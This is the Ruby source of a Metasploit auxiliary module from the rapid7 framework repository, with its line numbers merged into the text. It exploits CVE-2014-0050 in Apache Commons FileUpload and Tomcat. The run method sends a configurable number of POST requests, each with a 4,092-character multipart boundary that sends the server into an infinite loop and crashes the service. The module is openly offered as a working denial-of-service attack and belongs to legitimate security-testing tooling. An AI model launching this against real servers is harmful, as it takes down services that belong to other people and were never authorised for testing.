Path: blob/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',14'Description' => %q{15This module triggers an infinite loop in Apache Commons FileUpload 1.016through 1.3 via a specially crafted Content-Type header.17Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle18mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.5019and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also20uses Commons FileUpload as part of the Manager application.21},22'Author' => [23'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.24'ribeirux' # metasploit module25],26'License' => MSF_LICENSE,27'References' => [28['CVE', '2014-0050'],29['URL', 'https://tomcat.apache.org/security-8.html'],30['URL', 'https://tomcat.apache.org/security-7.html']31],32'DisclosureDate' => '2014-02-06',33'Notes' => {34'Stability' => [CRASH_SERVICE_DOWN],35'SideEffects' => [],36'Reliability' => []37}38)39)4041register_options(42[43Opt::RPORT(8080),44OptString.new('TARGETURI', [ true, 'The request URI', '/']),45OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])46]47)48end4950def run51boundary = '0' * 409252opts = {53'method' => 'POST',54'uri' => normalize_uri(target_uri.to_s),55'ctype' => "multipart/form-data; boundary=#{boundary}",56'data' => "#{boundary}00000",57'headers' => {58'Accept' => '*/*'59}60}6162# XXX: There is rarely, if ever, a need for a 'for' loop in Ruby63# This should be rewritten with 1.upto() or Enumerable#each or64# something65for x in 1..datastore['RLIMIT']66print_status("Sending request #{x} to #{peer}")67begin68c = connect69r = c.request_cgi(opts)70c.send_request(r)71# Don't wait for a response72rescue ::Rex::ConnectionError => e73print_error("Unable to connect: '#{e.message}'")74return75ensure76disconnect(c) if c77end78end79end80end818283